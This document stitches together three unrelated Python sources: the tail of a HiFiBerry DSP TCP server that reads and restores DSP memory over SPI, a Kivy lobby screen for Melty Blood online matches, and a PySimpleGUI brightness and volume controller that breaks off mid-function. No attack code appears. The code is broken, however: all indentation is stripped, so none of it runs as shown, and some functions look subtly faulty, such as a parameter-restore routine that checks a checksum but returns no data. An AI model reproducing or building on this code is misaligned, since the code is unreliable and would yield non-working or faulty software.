logging.info("restore: checking checksum")
checksum = SigmaTCPHandler.program_checksum(cached=False)
memory = SigmaTCPHandler.restore_parameters(checksum)
if memory is None:
return
logging.info("restore: writing to memory")
dsp = SigmaTCPHandler.dsp
if (len(memory) > dsp.DATA_LENGTH * dsp.WORD_LENGTH):
logging.error("Got %s bytes to restore, but memory is only %s",
len(memory),
dsp.DATA_LENGTH * dsp.WORD_LENGTH)
# Make sure DSP isn't running for this operation
SigmaTCPHandler._kill_dsp()
SigmaTCPHandler.spi.write(dsp.DATA_ADDR, memory)
# Restart the core
SigmaTCPHandler._start_dsp()
@staticmethod
def get_memory_block(addr, length):
block_size = 2048
dsp = SigmaTCPHandler.dsp
logging.debug("reading %s bytes from memory",
length * dsp.WORD_LENGTH)
# Must kill the core to read program memory, but it doesn't
# hurt doing it also for other memory types :(
SigmaTCPHandler._kill_dsp()
memory = bytearray()
while len(memory) < length * dsp.WORD_LENGTH:
logging.debug("reading memory code block from addr %s", addr)
data = SigmaTCPHandler.spi.read(addr, block_size)
# logging.debug("%s", data)
memory += data
addr = addr + int(block_size / dsp.WORD_LENGTH)
# Restart the core
SigmaTCPHandler._start_dsp()
return memory[0:length * dsp.WORD_LENGTH]
@staticmethod
def get_program_memory():
'''
Calculate a checksum of the program memory of the DSP
'''
dsp = SigmaTCPHandler.dsp
memory = SigmaTCPHandler.get_memory_block(dsp.PROGRAM_ADDR,
dsp.PROGRAM_LENGTH)
end_index = memory.find(dsp.PROGRAM_END_SIGNATURE)
if end_index < 0:
memsum = 0
for i in memory:
memsum = memsum + i
if (memsum > 0):
logging.error("couldn't find program end signature," +
" using full program memory")
end_index = dsp.PROGRAM_LENGTH - dsp.WORD_LENGTH
else:
logging.error("SPI returned only zeros - communication"
"error")
return None
else:
end_index = end_index + len(dsp.PROGRAM_END_SIGNATURE)
logging.debug("Program lengths = %s words",
end_index / dsp.WORD_LENGTH)
# logging.debug("%s", memory[0:end_index])
return memory[0:end_index]
@staticmethod
def get_data_memory():
'''
Calculate a checksum of the program memory of the DSP
'''
dsp = SigmaTCPHandler.dsp
memory = SigmaTCPHandler.get_memory_block(dsp.DATA_ADDR,
dsp.DATA_LENGTH)
logging.debug("Data lengths = %s words",
dsp.DATA_LENGTH / dsp.WORD_LENGTH)
# logging.debug("%s", memory[0:end_index])
return memory[0:dsp.DATA_LENGTH]
@staticmethod
def program_checksum(cached=True):
if cached and SigmaTCPHandler.checksum is not None:
logging.debug("using cached program checksum, "
"might not always be correct")
return SigmaTCPHandler.checksum
data = SigmaTCPHandler.get_program_memory()
m = hashlib.md5()
try:
m.update(data)
except:
logging.error("Can't calculate checksum from %s", data)
return None
logging.debug("length: %s, digest: %s", len(data), m.digest())
logging.info("caching program memory checksum")
SigmaTCPHandler.checksum = m.digest()
return SigmaTCPHandler.checksum
@staticmethod
def _list_str(int_list):
formatted_list = [str(item) for item in int_list]
return "[" + ','.join(formatted_list) + "]"
@staticmethod
def _response_packet(command, addr, data_length):
packet = bytearray(HEADER_SIZE)
packet[0] = command
packet[4] = 14 # header length
packet[5] = 1 # chip address
packet[9] = data_length & 0xff
packet[8] = (data_length >> 8) & 0xff
packet[7] = (data_length >> 16) & 0xff
packet[6] = (data_length >> 24) & 0xff
packet[11] = addr & 0xff
packet[10] = (addr >> 8) & 0xff
return packet
@staticmethod
def _kill_dsp():
logging.debug("killing DSP core")
dsp = SigmaTCPHandler.dsp
spi = SigmaTCPHandler.spi
spi.write(dsp.HIBERNATE_REGISTER,
int_data(1, dsp.REGISTER_WORD_LENGTH))
time.sleep(0.0001)
spi.write(dsp.KILLCORE_REGISTER,
int_data(0, dsp.REGISTER_WORD_LENGTH))
time.sleep(0.0001)
spi.write(dsp.KILLCORE_REGISTER,
int_data(1, dsp.REGISTER_WORD_LENGTH))
@staticmethod
def _start_dsp():
logging.debug("starting DSP core")
dsp = SigmaTCPHandler.dsp
spi = SigmaTCPHandler.spi
spi.write(dsp.KILLCORE_REGISTER,
int_data(0, dsp.REGISTER_WORD_LENGTH))
time.sleep(0.0001)
spi.write(dsp.STARTCORE_REGISTER,
int_data(0, dsp.REGISTER_WORD_LENGTH))
time.sleep(0.0001)
spi.write(dsp.STARTCORE_REGISTER,
int_data(1, dsp.REGISTER_WORD_LENGTH))
time.sleep(0.0001)
spi.write(dsp.HIBERNATE_REGISTER,
int_data(0, dsp.REGISTER_WORD_LENGTH))
@staticmethod
def store_parameters(checksum, memory):
with open(SigmaTCPHandler.parameterfile, "wb") as datafile:
datafile.write(checksum)
datafile.write(memory)
@staticmethod
def restore_parameters(checksum):
with open(SigmaTCPHandler.parameterfile, "rb") as datafile:
file_checksum = datafile.read(16)
logging.debug("Checking checksum %s/%s",
checksum, file_checksum)
if checksum != file_checksum:
logging.error("checksums do not match, aborting")
return
@staticmethod
def prepare_update():
'''
Call this method if the DSP program might change soon
'''
logging.info("preparing for memory update")
SigmaTCPHandler.checksum = None
SigmaTCPHandler.update_alsasync(clear=True)
SigmaTCPHandler.update_lgsoundsync(clear=True)
SigmaTCPHandler.updating = True
@staticmethod
def finish_update():
'''
Call this method after the DSP program has been refreshed
'''
logging.info("finished memory update")
SigmaTCPHandler.xml = None
ProgramRefresher().start()
@staticmethod
def update_alsasync(clear=False):
if SigmaTCPHandler.alsasync is None:
return
if clear:
SigmaTCPHandler.alsasync.set_volume_register(None)
return
volreg = SigmaTCPHandler.get_meta(ATTRIBUTE_VOL_CTL)
if volreg is None or len(volreg) == 0:
SigmaTCPHandler.alsasync.set_volume_register(None)
reg = datatools.parse_int(volreg)
SigmaTCPHandler.alsasync.set_volume_register(reg)
@staticmethod
def update_lgsoundsync(clear=False):
if SigmaTCPHandler.lgsoundsync is None:
logging.debug("LG Sound Sync instance is None")
return
if clear:
SigmaTCPHandler.lgsoundsync.set_registers(None, None)
return
logging.debug("checking profile for SPDIF state and volume control support")
volreg = SigmaTCPHandler.get_meta(ATTRIBUTE_VOL_CTL)
spdifreg = SigmaTCPHandler.get_meta(ATTRIBUTE_SPDIF_ACTIVE)
mutereg = SigmaTCPHandler.get_meta(ATTRIBUTE_MUTE_REG)
if volreg is None or len(volreg) == 0 or \
spdifreg is None or len(spdifreg) == 0 or \
mutereg is None or len(mutereg) == 0:
SigmaTCPHandler.lgsoundsync.set_registers(None, None, None)
logging.debug("disabled LG Sound Sync")
logging.info("enabling LG Sound Sync")
volr = datatools.parse_int(volreg)
spdifr = datatools.parse_int(spdifreg)
muter = datatools.parse_int(mutereg)
SigmaTCPHandler.lgsoundsync.set_registers(volr, spdifr, muter)
class ProgramRefresher(Thread):
def run(self):
logging.debug(
"running asynchrounous checksum refresh after potential update")
time.sleep(0)
# calculate cecksum
SigmaTCPHandler.program_checksum(cached=False)
# update volume register for ALSA control
SigmaTCPHandler.update_alsasync()
SigmaTCPHandler.update_lgsoundsync()
SigmaTCPHandler.updating = False
if this.notify_on_updates is not None:
r = requests.post(this.notify_on_updates)
logging.info("sent update notify to %s, HTTP status %s",
this.notify_on_updates, r.status_code)
class SigmaTCPServer(ThreadingMixIn, TCPServer):
def __init__(self,
server_address=("0.0.0.0", DEFAULT_PORT),
RequestHandlerClass=SigmaTCPHandler):
self.allow_reuse_address = True
TCPServer.__init__(self, server_address, RequestHandlerClass)
def server_activate(self):
TCPServer.server_activate(self)
def server_close(self):
TCPServer.server_close(self)
class SigmaTCPServerMain():
def __init__(self, alsa_mixer_name="DSPVolume"):
self.restore = False
self.abort = False
self.zeroconf = None
self.server = SigmaTCPServer()
params = self.parse_config()
if params["alsa"]:
logging.info("initializing ALSA mixer control %s", alsa_mixer_name)
alsasync = AlsaSync()
if alsasync.set_alsa_control(alsa_mixer_name):
SigmaTCPHandler.alsasync = alsasync
volreg = SigmaTCPHandler.get_meta(ATTRIBUTE_VOL_CTL)
if volreg is not None and len(volreg) > 0:
reg = datatools.parse_int(volreg)
alsasync.set_volume_register(reg)
alsasync.start()
else:
logging.error("can't create mixer control - aborting")
self.abort=True
else:
logging.info("not using ALSA volume control")
self.alsa_mixer_name = None
if params["lgsoundsync"]:
try:
logging.info("initializing LG Sound Sync")
SigmaTCPHandler.lgsoundsync = SoundSync()
SigmaTCPHandler.lgsoundsync.start()
SigmaTCPHandler.update_lgsoundsync()
except Exception as e:
logging.exception(e)
else:
logging.info("not enabling LG Sound Sync")
if this.notify_on_updates is not None:
logging.info("Sending notifies on program updates to %s",
this.notify_on_updates)
if params["restore"]:
self.restore = True
def parse_config(self):
config = configparser.ConfigParser()
config.optionxform = lambda option: option
config.read("/etc/sigmatcp.conf")
params = {}
try:
params["alsa"] = config.getboolean("server","alsa")
except:
params["alsa"] = False
if "--alsa" in sys.argv:
params["alsa"] = True
try:
params["lgsoundsync"] = config.getboolean("server","lgsoundsync")
except:
params["lgsoundsync"] = False
if "--lgsoundsync" in sys.argv:
params["lgsoundsync"] = True
try:
this.command_after_startup = config.get("server","command_after_startup")
except:
this.command_after_startup = None
try:
this.notify_on_updates = config.get("server","notify_on_updates")
except:
this.notify_on_updates = None
if "--restore" in sys.argv:
params["restore"] = True
else:
params["restore"] = False
return params
# def announce_zeroconf(self):
# desc = {'name': 'SigmaTCP',
# 'vendor': 'HiFiBerry',
# 'version': hifiberrydsp.__version__}
# hostname = socket.gethostname()
# try:
# ip = socket.gethostbyname(hostname)
# except Exception:
# logging.error("can't get IP for hostname %s, "
# "not initialising Zeroconf",
# hostname)
# return
#
# self.zeroconf_info = ServiceInfo(ZEROCONF_TYPE,
# "{}.{}".format(
# hostname, ZEROCONF_TYPE),
# socket.inet_aton(ip),
# DEFAULT_PORT, 0, 0, desc)
# self.zeroconf = Zeroconf()
# self.zeroconf.register_service(self.zeroconf_info)
#
# def shutdown_zeroconf(self):
# if self.zeroconf is not None and self.zeroconf_info is not None:
# self.zeroconf.unregister_service(self.zeroconf_info)
#
# self.zeroconf_info = None
# self.zeroconf.close()
# self.zeroconf = None
def run(self):
# Check if a DSP is detected
dsp_detected = adau145x.Adau145x.detect_dsp()
if dsp_detected:
logging.info("detected ADAU14xx DSP")
this.dsp="ADAU15xx"
else:
logging.info("did not detect ADAU14xx DSP")
this.dsp=""
if (self.restore):
try:
logging.info("restoring saved data memory")
SigmaTCPHandler.restore_data_memory()
SigmaTCPHandler.finish_update()
except IOError:
logging.info("no saved data found")
# logging.info("announcing via zeroconf")
# try:
# self.announce_zeroconf()
# except Exception as e:
# logging.debug("exception while initialising Zeroconf")
# logging.exception(e)
logging.debug("done")
logging.info(this.command_after_startup)
notifier_thread = Thread(target = startup_notify)
notifier_thread.start()
try:
if not(self.abort):
logging.info("starting TCP server")
self.server.serve_forever()
except KeyboardInterrupt:
logging.info("aborting ")
self.server.server_close()
if SigmaTCPHandler.alsasync is not None:
SigmaTCPHandler.alsasync.finish()
if SigmaTCPHandler.lgsoundsync is not None:
SigmaTCPHandler.lgsoundsync.finish()
# logging.info("removing from zeroconf")
# self.shutdown_zeroconf()
logging.info("saving DSP data memory")
SigmaTCPHandler.save_data_memory()
|
lobbyscreen.py | from json.decoder import JSONDecodeError
import time
import requests
import threading
import pyperclip
import subprocess
from functools import partial
from config import *
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import Screen
from ui.modals import *
from ui.buttons import DummyBtn, PlayerRow
import presence
import logging
class LobbyScreen(Screen):
active_pop = None # active popup on the screen
player_list = ObjectProperty(None) # layout for players
challenge_list = ObjectProperty(None) # layout for players
match_list = ObjectProperty(None) # layout for players
lobby_code = ObjectProperty(None) # layout for players
def __init__(self, CApp, **kwargs):
super(LobbyScreen, self).__init__(**kwargs)
self.app = CApp
self.secret = None # secret required for server messages
self.lobby_thread_flag = 0 #whether or not the thread is running
self.watch_player = None # id of player to watch for spectating, TODO
self.player_id = None # our own ID as provided by the JSON
self.code = None # lobby code
self.lobby_updater = None # thread to manage lobby updates
self.widget_index = {} #ids of players, widget of lobby
self.error = False
self.challenge_name = None #name of player being challenged
self.opponent = None # name of player currently being played against
self.challenge_id = None #id of player being challenged
self.type = None
self.get_attempts = 0 #if 2, exit
def create(self, j, first=False, type=""): # json response object
print(j)
#this does not use self.type because it should only run once per lobby.
#the reason for this is that a player may start a Direct Online match separately and we do not want to erase that status.
#self.type is used for update_stats in the Caster function to signal info to the presence.
newSound = False
if first:
self.player_id = j['msg']
self.code = j['id']
self.lobby_code.text = "[%s Lobby Code: %s]" % (type, self.code)
self.widget_index = {}
self.player_list.clear_widgets()
self.match_list.clear_widgets()
self.challenge_list.clear_widgets()
self.type = type
if self.app.discord is True:
if type.lower() == 'public':
self.app.mode = 'Public Lobby'
presence.public_lobby(self.code)
elif type.lower() == 'private':
self.app.mode = 'Private Lobby'
presence.private_lobby()
self.app.game.update_stats(once=True)
challenging_ids = []
# TODO: come up with a solution for players with identical names (this does not affect the server )
if j['challenges'] != []:
if 'c' not in self.widget_index:
h = DummyBtn()
h.text = 'Challenges (click to accept)'
self.challenge_list.add_widget(h)
self.widget_index.update({'c':h})
for i in j['challenges']: # name, id, ip of challenger
challenging_ids.append(i[1])
if i[1] in self.widget_index:
if self.widget_index.get(i[1]).parent == self.challenge_list:
pass
else: #remove idle player
self.widget_index.get(i[1]).parent.remove_widget(self.widget_index.get(i[1]))
p = PlayerRow()
p.ids['PlayerBtn'].text = i[0]
p.ids['PlayerBtn'].bind(on_release=partial(
self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
p.ids['WatchBtn'].text = ""
self.challenge_list.add_widget(p)
self.widget_index.update({i[1]:p})
if newSound is False:
self.app.sound.play_alert()
newSound = True
else:
p = PlayerRow()
p.ids['PlayerBtn'].text = i[0]
p.ids['PlayerBtn'].bind(on_release=partial(
self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
p.ids['WatchBtn'].text = ""
self.challenge_list.add_widget(p)
self.widget_index.update({i[1]:p})
if newSound is False:
self.app.sound.play_alert()
newSound = True
else:
n = []
for k,v in self.widget_index.items():
if v in self.challenge_list.children:
v.parent.remove_widget(v)
n.append(k)
for i in n:
self.widget_index.pop(i)
if j['idle'] != []:
if 'i' not in self.widget_index:
h = DummyBtn()
h.text = 'Idle players (click to challenge)'
self.player_list.add_widget(h)
self.widget_index.update({'i':h})
for i in j['idle']:
if i[1] not in challenging_ids:
if i[1] in self.widget_index:
pass
else:
p = PlayerRow()
p.ids['PlayerBtn'].text = i[0]
if i[1] != self.player_id:
p.ids['PlayerBtn'].bind(on_release=partial(
self.send_challenge, name=i[0], id=i[1]))
if i[1] == self.watch_player:
p.ids['WatchBtn'].text = 'FOLLOWING'
else:
p.ids['WatchBtn'].text = 'FOLLOW'
p.ids['WatchBtn'].bind(on_release=partial(self.follow_player, i=i[1]))
else:
p.ids['PlayerBtn'].text += " (self)"
p.ids['WatchBtn'].disabled = True
p.ids['WatchBtn'].text = ""
self.player_list.add_widget(p)
self.widget_index.update({i[1]:p})
else:
n = []
for k,v in self.widget_index.items():
if v in self.player_list.children:
v.parent.remove_widget(v)
n.append(k)
for i in n:
self.widget_index.pop(i)
if j['playing'] != []:
if 'w' not in self.widget_index:
h = DummyBtn()
h.text = 'Now playing (click to watch)'
self.match_list.add_widget(h)
self.widget_index.update({'w':h})
for i in j['playing']:
if (i[2],i[3]) in self.widget_index:
pass
else:
p = PlayerRow()
p.ids['PlayerBtn'].text = "%s vs %s" % (i[0], i[1])
if i[2] != self.player_id and i[3] != self.player_id:
p.ids['PlayerBtn'].bind(on_release=partial(self.watch_match,
name="%s vs %s" % (i[0], i[1]), ip=i[4]))
p.ids['WatchBtn'].text = ""
self.match_list.add_widget(p)
self.widget_index.update({(i[2],i[3]):p})
if i[2] == self.watch_player or i[3] == self.watch_player:
self.watch_match(name="%s vs %s" % (i[0], i[1]), ip=i[4])
else:
n = []
for k,v in self.widget_index.items():
if v in self.match_list.children:
v.parent.remove_widget(v)
n.append(k)
for i in n:
self.widget_index.pop(i)
#if any widgets in the list don't correspond to json items, remove them
n = []
for k in self.widget_index.keys():
ok = False
if k != 'w' and k != 'c' and k != 'i':
for i in j['challenges']:
if k == i[1]:
ok = True
for i in j['idle']:
if k == i[1]:
ok = True
for i in j['playing']:
if k == (i[2],i[3]) or k == (i[3],i[2]):
ok = True
if ok is False:
n.append(k)
for i in n:
self.widget_index.get(i).parent.remove_widget(self.widget_index.get(i))
self.widget_index.pop(i)
if first:
self.app.lobby_button()
self.lobby_thread_flag = 0
self.lobby_updater = threading.Thread(
target=self.auto_refresh, daemon=True) # netplay watchdog
self.lobby_updater.start()
else:
if len(self.challenge_list.children) > 0:
self.app.update_lobby_button('LOBBY %s (%s)' % (self.code,len(self.challenge_list.children) - 1))
else:
self.app.update_lobby_button('LOBBY %s ' % self.code)
def follow_player(self,obj,i):
w = self.widget_index.get(i).ids['WatchBtn']
if w.text == 'FOLLOW':
self.watch_player = i
for k,v in self.widget_index.items(): # clear first
try:
if v.parent == self.player_list and k != self.player_id:
v.ids['WatchBtn'].text = 'FOLLOW'
except KeyError:
pass
w.text = 'FOLLOWING'
else:
self.watch_player = None
w.text = 'FOLLOW'
def auto_refresh(self):
while True:
if self.lobby_thread_flag != 0:
break
p = {
'action': 'status',
'id': self.code,
'p': self.player_id,
'secret': self.secret
}
try:
req = requests.get(url=LOBBYURL, params=p, timeout=5)
req.raise_for_status()
except (requests.exceptions.ConnectionError,requests.exceptions.Timeout) as e:
logging.warning('LOBBY REFRESH: %s' % e.__class__)
if self.get_attempts < 2:
self.get_attempts += 1
logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
else:
logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
self.exit(msg='Error: %s' % e.__class__)
break
else:
r = req.json()
if r['msg'] == 'OK':
self.create(r)
time.sleep(2)
else:
self.exit(msg=r['msg'])
break
def exit(self,msg=None):
self.lobby_thread_flag = 1
try:
p = {
'action': 'leave',
'id': self.code,
'p': self.player_id,
'secret': self.secret
}
requests.get(url=LOBBYURL, params=p)
except:
pass
self.secret = None
self.watch_player = None
self.player_id = None
self.code = None
self.type = None
self.lobby_updater = None
self.get_attempts = 0
self.app.remove_lobby_button()
self.app.LobbyList.refresh()
if msg:
popup = GameModal()
popup.modal_txt.text = msg
popup.close_btn.text = 'Close'
popup.close_btn.bind(on_release=popup.dismiss)
popup.open()
# Set Rich Presence to main menu again
if self.app.discord is True:
presence.menu()
self.app.game.update_stats(once=True)
def send_challenge(self, obj, name, id, *args):
self.watch_player = None
for k,v in self.widget_index.items():
try:
if k != self.player_id and v.parent == self.player_list:
v.ids['WatchBtn'].text = "FOLLOW"
except KeyError:
pass
self.challenge_name = name
self.challenge_id = id
popup = GameModal()
popup.modal_txt.text = 'Challenging %s' % self.challenge_name
popup.close_btn.text = 'Stop Playing'
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
self.active_pop = popup
popup.open()
caster = threading.Thread(
target=self.app.game.host, args=[self, app_config['settings']['netplay_port']], daemon=True)
caster.start()
def set_ip(self):
pyperclip.copy('') #erase IP address from clipboard
p = {
't': self.challenge_id,
'p': self.player_id,
'action': 'challenge',
'id': self.code,
'ip': self.app.game.adr,
'secret': self.secret
}
print(p)
c = requests.get(url=LOBBYURL, params=p).json()
print(c)
def accept_challenge(self, obj, name, id, ip, *args):
self.watch_player = None
for k,v in self.widget_index.items():
try:
if k != self.player_id and v.parent == self.player_list:
v.ids['WatchBtn'].text = "FOLLOW"
except KeyError:
pass
caster = threading.Thread(target=self.app.game.join, args=[
ip, self, id], daemon=True)
caster.start()
threading.Thread(target=self.send_pre_accept,args=[self.player_id,id]).start()
popup = GameModal()
popup.modal_txt.text = 'Connecting to %s' % name
popup.close_btn.text = 'Stop Playing'
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
self.active_pop = popup
popup.open()
def send_pre_accept(self,id,target):
p = {
't': target,
'p': id,
'action': 'pre_accept',
'id': self.code,
'secret': self.secret
}
print(p)
c = requests.get(url=LOBBYURL, params=p).json()
print(c)
def confirm(self, obj, r, d, p, n, t=None, *args):
try:
self.app.game.confirm_frames(int(r.text),int(d.text))
self.opponent = n
self.active_pop.modal_txt.text += "\nConnected to: %s, %s Delay & %s Rollback" % (
n, d.text, r.text)
p.dismiss()
if t: #if accepting, run MBAA check
threading.Thread(target=self.wait_for_MBAA, args=[t]).start()
except ValueError:
pass
def wait_for_MBAA(self, t):
while True:
if self.app.game.playing is True and self.active_pop != None:
if self.app.game.read_memory(0x54EEE8) == 20: #wait for char select
resp = {
't': t,
'p': self.player_id,
'action': 'accept',
'id': self.code,
'secret': self.secret
}
print(resp)
c = requests.get(url=LOBBYURL, params=resp).json()
print(c)
self.current_player = t
break
else:
break
def watch_match(self, obj=None, name="", ip="", *args):
self.watch_player = None
for k,v in self.widget_index.items():
try:
if k != self.player_id and v.parent == self.player_list:
v.ids['WatchBtn'].text = "FOLLOW"
except KeyError:
pass
popup = GameModal()
caster = threading.Thread(
target=self.app.game.watch, args=[ip,self], daemon=True)
self.active_pop = popup
popup.modal_txt.text = 'Watching %s' % name
popup.close_btn.text = 'Stop watching'
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
popup.open()
self.app.offline_mode = 'Spectating' #needs to be an offline mode for lobby multitasking
caster.start()
def set_frames(self, name, delay, ping, target=None, mode="Versus", rounds=2):
popup = FrameModal()
if rounds != 0:
rounds = ", %s rounds per game" % rounds
else:
rounds = ''
popup.frame_txt.text = '[b]Connected to %s[/b]\n[size=14][u]%s mode%s[/u]\nNetwork delay: %s (%s ms)\nSuggested: Delay %s, Rollback %s[/size]' % (
name, mode, rounds, delay, ping, self.app.game.ds, self.app.game.rs)
popup.r_input.text = str(self.app.game.rs)
popup.d_input.text = str(self.app.game.ds)
popup.start_btn.bind(on_release=partial(
self.confirm, p=popup, r=popup.r_input, d=popup.d_input, n=name, t=target))
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
popup.open()
def error_message(self,e):
self.error = True
popup = GameModal()
for i in e:
popup.modal_txt.text += i + '\n'
popup.close_btn.bind(on_release=partial(self.dismiss_error,p = popup))
popup.close_btn.text = "Close"
if self.active_pop != None:
self.active_pop.dismiss()
self.active_pop = None
popup.open()
def dismiss_error(self,obj,p):
p.dismiss()
self.error = False
# TODO prevent players from dismissing caster until MBAA is open to avoid locking issues
def dismiss(self, obj, p, *args):
self.app.game.kill_caster()
self.challenge_name = None
self.opponent = None
self.challenge_id = None
r = {
'action': 'end',
'p': self.player_id,
'id': self.code,
'secret': self.secret
}
requests.get(url=LOBBYURL, params=r)
p.dismiss()
if self.active_pop != None:
self.active_pop.dismiss()
self.active_pop = None
def invite_link(self,*args):
pyperclip.copy('https://invite.meltyblood.club/%s' % self.code)
threading.Thread(target=self.invite_ui).start()
def invite_ui(self):
if self.lobby_code.text != 'Link copied to clipboard':
t = self.lobby_code.text
self.lobby_code.text = 'Link copied to clipboard'
time.sleep(2)
self.lobby_code.text = t |
main.py | from __future__ import annotations
import _thread
import os
import re
from datetime import datetime, timedelta
import PySimpleGUIQt as sg
import asyncio
import threading
import sys
import brightness_control
import volume_control
import audio_listener
from serialization import *
from calibration import *
from logger import Logger
# https://docs.microsoft.com/en-us/windows/win32/api/endpointvolume/nn-endpointvolume-iaudioendpointvolume
monitors = brightness_control.getMonitors()
num_displays = 1
num_audio = 1
def font(size: int):
return 'Consolas' + ' ' + str(size)
sg.theme("Dark")
header_font = font(24)
body_font = font(14)
small_body_font = font(10)
def make_window():
full_size = (1000, 760) # width, height
monitor_image = "monitor_image.png"
speaker_image = "speaker_image.png"
left_col = [[sg.Image(monitor_image)], [sg.Text("\nDisplays\n", font=header_font)]]
for i in range(num_displays):
key = 'display' + str(i)
image_col = [[sg.Text("\n", font=font(2))],
[sg.Text("Display\n", font=body_font)]]
settings_col = [[sg.Text("\n", font=font(6))],
[sg.Slider(range=(0, 100), orientation='h', key=key,
disabled=False, enable_events=True),
sg.Text("", key=key + '.text', font=small_body_font)],
[sg.Checkbox("Enable !surprised", key=key + '.enabled',
enable_events=True, font=small_body_font, size=(23, 1.75))]]
device_unit = [[sg.Column(image_col, element_justification='c'), sg.Column(settings_col)]]
left_col.append([sg.Column(device_unit)])
right_col = [[sg.Image(speaker_image)], [sg.Text("\nAudio\n", font=header_font)]]
for i in range(num_audio):
key = 'audio' + str(i)
image_col = [[sg.Text("\n", font=font(2))],
[sg.Text("Speaker\n", font=body_font)]]
settings_col = [[sg.Text("\n", font=font(6))],
[sg.Slider(range=(0, 100), orientation='h', key=key,
disabled=False, enable_events=True),
sg.Text("", key=key + '.text', font=small_body_font)],
[sg.Checkbox("Enable !surprised", key=key + '.enabled',
enable_events=True, font=small_body_font, size=(23, 1.25))],
[sg.Checkbox("Is speaker", key=key + '.speaker',
enable_events=True, font=small_body_font)]]
device_unit = [[sg.Column(image_col, element_justification='c'), sg.Column(settings_col)]]
right_col.append([sg.Column(device_unit)])
calibrate_button1 = sg.Button('Calibrate display', font=body_font, size=(300, 70), button_color=("#dedede", "#3f618a"))
calibrate_button2 = sg.Button('Calibrate audio', font=body_font, size=(300, 70), button_color=("#dedede", "#3f618a"))
debug_editor = sg.Multiline('', key='debug', font=small_body_font, size=(800, 100))
clear_button = sg.Button('Clear', font=small_body_font, size=(160, 40), button_color=("#dedede", "#c74d42"))
debug_apply = sg.Button("Apply calibration data", key='debug.apply', font=small_body_font, size=(300, 40))
log_button = sg.Button('View logs', key='debug.logs', font=small_body_font, size=(160, 40))
button_container = [[sg.Stretch(), calibrate_button1, sg.Text('\t'), calibrate_button2, sg.Stretch()],
[debug_editor],
[sg.Stretch(), clear_button, sg.Stretch(), debug_apply, sg.Stretch(), log_button, sg.Stretch()]]
layout = [[sg.Stretch(),
sg.Column(left_col, element_justification='c'),
sg.Stretch(),
sg.Stretch(),
sg.Column(right_col, element_justification='c'),
sg.Stretch()],
[sg.Column(button_container, element_justification='c')]]
scrollable = [[sg.Column(layout, size=full_size, scrollable=True)]]
window = sg.Window("!surprised", scrollable, size=full_size, icon="logo.ico",
resizable=False, disable_minimize=True)
return window
def make_tray():
menu = ['', ['&Configure', '---', 'E&xit']]
tooltip = '!surprised'
tray = sg.SystemTray(menu, tooltip=tooltip, filename="logo.ico")
return tray
def show_popup():
choice, _ = sg.Window('Success!',
[[sg.Text('\nCalibration Successful!\n', font=small_body_font)]],
disable_minimize=True, resizable=False, icon="logo.ico", size=(250, 150))\
.read(close=True)
def show_confirmation():
choice, _ = sg.Window('Are you sure?',
[[sg.Text('\nDo you want to clear all calibration data?\n', font=small_body_font)],
[sg.Stretch(),
sg.Button('Yes', font=small_body_font, size=(100, 40), button_color=("#dedede", "#c74d42")),
sg.Button('No', font=small_body_font, size=(100, 40), button_color=("#dedede", "#3f618a")),
sg.Stretch()]],
disable_minimize=True, resizable=False, icon="logo.ico", size=(400, 150))\
.read(close=True)
return choice == 'Yes'
def read(window: sg.Window | None, tray: sg.SystemTray, timeout=100) -> tuple[str, dict | None]:
if window is not None:
event, values = window.read(timeout)
if event != sg.TIMEOUT_EVENT:
return event, values
event = tray.read(timeout)
return event, {}
def check_slider_changes(event: str, values: dict[str, int], no_refresh_until: dict[str, datetime]) -> bool:
if not event or not values:
return False
prefix, i, suffix = parse_key(event)
if suffix:
return False
elif prefix == 'display':
value = values[event]
brightness_control.setBrightness(value)
elif prefix == 'audio':
value = values[event]
volume_control.setVolume(value)
else:
return False
no_refresh_until[event] = datetime.now() + timedelta(milliseconds=500)
return True
def refresh_values(window: sg.Window | None, no_refresh_until: dict[str, datetime]):
def should_refresh(key):
if key in no_refresh_until:
if datetime.now() < no_refresh_until[key]:
# print(key)
return False
else:
del no_refresh_until[key]
return True
if window is None:
return
for i in range(num_displays):
key = "display" + str(i)
if should_refresh(key):
slider = window[key]
value = brightness_control.getBrightness2(i)
slider.update(value)
for i in range(num_audio):
key = "audio" + str(i)
if should_refresh(key):
slider = window[key]
value = volume_control.getVolume()
slider.update(value)
def update_slider_text(window: sg.Window | None, values: dict[str, int]):
def update(key: str):
if key in values:
value = values[key]
window[key + '.text'].update(str(value) + '%')
if window is None:
return
for i in range(num_displays):
update("display" + str(i))
for i in range(num_audio):
update("audio" + str(i))
def parse_key(key: str) -> tuple[str, int, str]:
match = re.match(r'^(.+)([0-9]+).?([A-Za-z]*)$', key)
if match is not None:
groups = match.groups()
return groups[0], int(groups[1]), groups[2]
else:
return '', -1, ''
async def calibrate(client, brightness_points, volume_points, enabled):
if brightness_points is not None:
add_point(brightness_points, await getBrightnessPoint(client))
if volume_points is not None:
add_point(volume_points, await getVolumePoint(client))
def deserialize_calibration():
try:
brightness_points, volume_points, enabled = deserialize()
except:
brightness_points = []
volume_points = []
enabled = {'display0.enabled': False, 'audio0.enabled': False, 'audio0.speaker': False}
return brightness_points, volume_points, enabled
async def run(logger, start_in_background):
async def connect():
await client.discover_and_connect()
def apply_changes():
data = (brightness_points, volume_points, enabled)
serialize(data)
window['debug'].update(repr(data))
for key in enabled:
window[key].update(enabled[key])
def set_title(additional_text):
nonlocal current_title
title = '!surprised'
if additional_text:
title += ' [{}]'.format(additional_text)
if title != current_title:
window.QT_QMainWindow.setWindowTitle(title)
current_title = title
current_title = '!surprised'
async def auto_adjust_subscribe():
future = asyncio.Future()
def on_disconnect(_):
print("Disconnected.")
future.set_result(True)
def adjust(points, fn, value):
if len(points) >= 2:
points.sort(key=firstElement)
x = listOfFirst(points)
y = listOfSecond(points)
fn(value, x, y)
def set_brightness(new, old):
if enabled['display0.enabled']:
adjust(brightness_points, brightness, new)
def set_volume(new, old):
async def do():
if enabled['audio0.speaker'] and await audio_listener.is_playing_audio():
await client.pause_volume(old)
print('Pausing volume update')
else:
adjust(volume_points, volume, new)
if enabled['audio0.enabled']:
asyncio.ensure_future(do())
